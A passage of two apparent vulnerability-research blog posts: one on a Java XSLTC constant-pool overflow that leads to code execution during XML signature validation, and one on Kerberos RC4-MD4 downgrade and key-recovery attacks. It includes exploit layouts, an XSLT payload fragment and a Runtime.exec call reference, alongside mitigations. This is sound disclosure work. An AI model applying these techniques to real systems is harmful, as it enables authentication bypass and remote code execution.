at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584) at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818) at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130) at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124) at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173) at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457) at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387) at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify a XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later) we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java which is part of a module called XSLTC.


XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**

     * As Gregor Samsa awoke one morning from uneasy dreams he found himself

     * transformed in his bed into a gigantic insect. He was lying on his hard,

     * as it were armour plated, back, and if he lifted his head a little he

     * could see his big, brown belly divided into stiff, arched segments, on

     * top of which the bed quilt could hardly keep in position and was about

     * to slide off completely. His numerous legs, which were pitifully thin

     * compared to the rest of his bulk, waved helplessly before his eyes.

     * "What has happened to me?", he thought. It was no dream....

     */

    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes a XSLT stylesheet as input and returns a JIT'ed Java class, called translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method. 


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html

ClassFile {

    u4             magic;

    u2             minor_version;

    u2             major_version;

    u2             constant_pool_count;

    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object

    u2             access_flags;

    u2             this_class;

    u2             super_class;

    u2             interfaces_count;

    u2             interfaces[interfaces_count];

    u2             fields_count;

    field_info     fields[fields_count];

    u2             methods_count;

    method_info    methods[methods_count];

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java

public void translate(ClassGenerator classGen, MethodGenerator methodGen) {

        ConstantPoolGen cpg = classGen.getConstantPool();

        InstructionList il = methodGen.getInstructionList();

        il.append(new PUSH(cpg, _value));

    }

// org/apache/bcel/internal/generic/PUSH.java

public PUSH(final ConstantPoolGen cp, final int value) {

        if ((value >= -1) && (value <= 5)) {

            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);

        } else if (Instruction.isValidByte(value)) {

            instruction = new BIPUSH((byte) value);

        } else if (Instruction.isValidShort(value)) {

            instruction = new SIPUSH((short) value);

        } else {

            instruction = new LDC(cp.addInteger(value));

        }

    }


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCELs internal constant pool representation uses a standard Java Array for storing constants, and does not enforce any limits on its length.

When XSLTC processes a stylesheet that contains more constants, and BCELs internal class representation is serialized to a class file at the end of the compilation process the array length is truncated to a short, but the complete array is written out:

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 

Exploiting a constant pool overflow


To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

Constant Kind

Tag

Description

Layout

CONSTANT_Utf8

1

Constant variable-sized UTF-8 string value

CONSTANT_Utf8_info {

    u1 tag;

    u2 length;

    u1 bytes[length];

}


CONSTANT_Integer

3

4-byte integer

CONSTANT_Integer_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Float

4

4-byte float

CONSTANT_Float_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Long

5

8-byte long

CONSTANT_Long_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}


CONSTANT_Double

6

8-byte double

CONSTANT_Double_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}

CONSTANT_Class

7

Reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {

    u1 tag;

    u2 name_index;

}


CONSTANT_String

8

A JVM “String”. Links to a UTF8 constant. 

CONSTANT_String_info {

    u1 tag;

    u2 string_index;

}


CONSTANT_Fieldref

CONSTANT_Methodref

CONSTANT_InterfaceMethodref

9

10

11

Reference to a class field or method. Links to a Class constant 

CONSTANT_Fieldref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_Methodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_InterfaceMethodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_NameAndType

12

Describes a field or method.

CONSTANT_NameAndType_info {

    u1 tag;

    u2 name_index;

    u2 descriptor_index;

}


CONSTANT_MethodHandle

15

Describes a method handle.

 

CONSTANT_MethodHandle_info {

    u1 tag;

    u1 reference_kind;

    u2 reference_index;

}


CONSTANT_MethodType

16

Describes a method type. Points to a UTF8 constant containing a method descriptor.

CONSTANT_MethodType_info {

    u1 tag;

    u2 descriptor_index;

}



A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized containing fully attacker controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields. 


The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating numbers to create CONSTANT_Double entry with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];

    u2             access_flags;

    u2             this_class;

    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING          CONST_DOUBLE

0x08 0x07 0x02  0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

access_flags  this_class   super_class  ints_count  fields_count methods_count


  1. We craft a XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.

  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in an usable access_flags value of 0x0807. 

  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create an empty interface and fields arrays, before setting the last two bytes to the number of methods we want to define. 


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We constructed the initial header fields and are now in the interesting part of the class file definition: The methods table. This is where all methods of a class and their bytecode is defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {

    [...]

    u2             methods_count;

    method_info    methods[methods_count];

    [...]

}

    

method_info {

    u2             access_flags;

    u2             name_index;

    u2             descriptor_index;

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


attribute_info {

    u2 attribute_name_index;

    u4 attribute_length;

    u1 info[attribute_length];

}



Code_attribute {

    u2 attribute_name_index;

    u4 attribute_length;

    u2 max_stack;

    u2 max_locals;

    u4 code_length;

    u1 code[code_length];

    u2 exception_table_length;

    {   u2 start_pc;

        u2 end_pc;

        u2 handler_pc;

        u2 catch_type;

    } exception_table[exception_table_length];

    u2 attributes_count;

    attribute_info attributes[attributes_count];

}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8). 

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method. 



Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flag field of the first method, making it unusable for us. Instead we have to create two methods: The first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA


First Method Header

access_flags 0x0601 

name_index  0xXXXX

desc_index 0xYYYY  

attr_count 0x0001

Attribute [0]

name_index 0xZZ06

length 0x00000005

data   “\x00\x00\x00\x00\x06”


Second Method Header

access_flags 0x0001

name_index  0xCCCC -> <init>

desc_index 0xDDDD  -> ()V

attr_count 0x0003 


Attribute [0]

name_index 0x0600

length 0x00000004

data   “\x00\x00\x00\x06

Attribute [1]

name_index 0xCCDD -> Code

length 0xZZZZZZZZ

data  PAYLOAD

Attribute [2] ...



We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet and the call will only be blocked during runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding a XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass, before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass, calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor either by adding an endless loop at the end or throwing an exception, which is the approach I used in my exploit Proof-of-Concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the object pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.



Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented  proof-of-concept script.


Impact and Restrictions

In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:


As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use a allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don’t use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.


Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.


RC4 Is Still Considered Harmful

By: Tim
27 October 2022 at 19:48

By James Forshaw, Project Zero


I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue number 2310 with the handling of RC4 encryption that allowed you to authenticate as another user if you could either interpose on the Kerberos network traffic to and from the KDC or directly if the user was configured to disable typical pre-authentication requirements.


This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note, I'm not going to spend time fully explaining how Kerberos authentication works, there's plenty of resources online. For example this blog post by Steve Syfuhs who works at Microsoft is a good first start.

Background

Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials the design allows for negotiating the encryption and checksum algorithms that the client and server will use. 


For example when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC) a client can specify a list supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.


KDC-REQ-BODY    ::= SEQUENCE {

...

    etype    [8] SEQUENCE OF Int32 -- EncryptionType

                                   -- in preference order --,

...

}


When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:


EncryptedData   ::= SEQUENCE {

        etype   [0] Int32 -- EncryptionType --,

        kvno    [1] UInt32 OPTIONAL,

        cipher  [2] OCTET STRING -- ciphertext

}


The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.


Alt Text: Diagram showing the based Kerberos authentication and requesting an AES key type.

This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of the flexibility developers were able to add support for AES through RFC3962 which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.


Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006. 


The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems. 


If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as is. Instead it puts in place various protections to guard against common cryptographic attacks:

  • The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.

  • The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.

  • The base key is not the user's key, but instead is derived from a MD5 HMAC keyed with the user's key over a 4 byte message type value. For example the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.


Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password. 


As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.


As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks for example no salting or multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key they can attempt to brute force the key through guessing the password. As user's will tend to choose weak or trivial passwords this increases the chance that a brute force attack would work to recover the key. And with the key the attacker can then authenticate as that user to any service they like. 


To get appropriate cipher text the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as their preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain-text is known for the ticket data the attacker can try to brute force the key from that. 


This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also modern versions of Windows Server will try to block this attack by forcing the use of AES keys which are derived from the service user's password over RC4 even if the attacker only requested RC4 support.


An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.


Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack. 


However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.


The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.

Windows Kerberos Encryption Implementation

While working on researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG at least for Kerberos is to protect the user's keys, specifically the ones derived from their password and session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm I hoped to be able to extract the original key removing CG's protection.


The encryption algorithms are all implemented inside the CRYPTDLL.DLL library which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented but it's fairly easy to work out how to call the exported functions. For example, to get a "crypto system" from the encryption type integer you can use the following exported function:


NTSTATUS CDLocateCSystem(int etype, KERB_ECRYPT** engine);


The KERB_ECRYPT structure contains configuration information for the engine such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what algorithm is supposed to be, which lead to the following supported systems:


Name                                    Encryption Type

----                                    ---------------

RSADSI RC4-HMAC                         24

RSADSI RC4-HMAC                         23

Kerberos AES256-CTS-HMAC-SHA1-96        18

Kerberos AES128-CTS-HMAC-SHA1-96        17

Kerberos DES-CBC-MD5                    3

Kerberos DES-CBC-CRC                    1

RSADSI RC4-MD4                          -128

Kerberos DES-Plain                      -132

RSADSI RC4-HMAC                         -133

RSADSI RC4                              -134

RSADSI RC4-HMAC                         -135

RSADSI RC4-EXP                          -136

RSADSI RC4                              -140

RSADSI RC4-EXP                          -141

Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN  -148

Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN  -149


Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers. 


However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:


  • Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.

  • The key is used as-is, there's no blinding so the key stream is always the same for the same user key.

  • The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.

  • The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.

  • Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.


To say this is bad from a cryptographic standpoint, is an understatement. Fortunately it would be safe to assume that while this crypto system is implemented in CRYPTDLL, it wouldn't be used by Kerberos? Unfortunately not — it is totally accepted as a valid encryption type when sent in the AS-REQ to the KDC. The question then becomes how to exploit this behavior?

Exploitation on the Wire (CVE-2022-33647)

My first thoughts were to attack the session key generation. If we could get the server to return the AS-REP with a RC4-MD4 session key for the TGT then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT which is sent in the clear and the session key and make requests as that authenticated user.


The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.


Brute forcing the 40 bit key would be technically feasible at least if you built a giant lookup table, however I felt like it's not practical. I realized there's a simpler way, when a client authenticates it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code. 


As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.


When the KDC received the timestamp it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm the key stream used for the timestamp must be the same as used in the response to encrypt the session key. Therefore we could mount a known-plaintext attack to recover the keystream from the timestamp and use that to decrypt parts of the response.


Diagram showing the attack process. A computer with a kerberos client sends an AS-REQ to the attacker, which returns an error requesting pre-authentication and selecting RC4-MD4 encryption. The client then converts the user's password into an RC4-MD4 key which is used to encrypt the timestamp to send to the KDC. This is used to validate the user authentication and an AS-REP is returned with a TGT session key generated for RC4-MD4.
The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.


PA-ENC-TS-ENC           ::= SEQUENCE {

     patimestamp     [0] KerberosTime -- client's time --,

     pausec          [1] Microseconds OPTIONAL

}


The AS-REP encrypted response has the following ASN.1 structure:


EncASRepPart  ::= SEQUENCE {

     key             [0] EncryptionKey,

     last-req        [1] LastReq,

     nonce           [2] UInt32,

     key-expiration  [3] KerberosTime OPTIONAL,

     flags           [4] TicketFlags,

     authtime        [5] KerberosTime,

     starttime       [6] KerberosTime OPTIONAL,

     endtime         [7] KerberosTime,

     renew-till      [8] KerberosTime OPTIONAL,

     srealm          [9] Realm,

     sname           [10] PrincipalName,

     caddr           [11] HostAddresses OPTIONAL

}


We can see from the two structures that as luck would have it the session key in the AS-REP is at the start of the encrypted data. This means there should be an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt the session key without any brute force needed.


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the timestamp with the 40 bit session key in the AS-REP.

The diagram shows the ASN.1 DER structures for the timestamp and the start of the AS-REP. The values with specific hex digits in green are plain-text we know or can calculate as they are part of the ASN.1 structure such as types and lengths. We can see that there's a clear overlap between 4 bytes of known data in the timestamp with the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, but this does mean we need to brute force the final key byte. 


We can do this brute force one of two ways. First we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively we can capture a service ticket request from the client which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key we can perform the brute force attack locally without needing to talk to the KDC which will be faster. Regardless of the option chosen this approach would be orders of magnitude faster than brute forcing the entire 40 bit session key.


The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. However, I've not verified that approach.

Exploitation without Interception (CVE-2022-33679)

The requirement to have access to the client to server authentication traffic does make this vulnerability seem less impactful. Although there's plenty of scenarios where an attacker could interpose, such as shared wifi networks, or physical attacks which could be used to compromise the computer account authentication which would take place when a domain joined system was booted.


It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption and the KDC will send back the AS-REP encrypted using that algorithm.


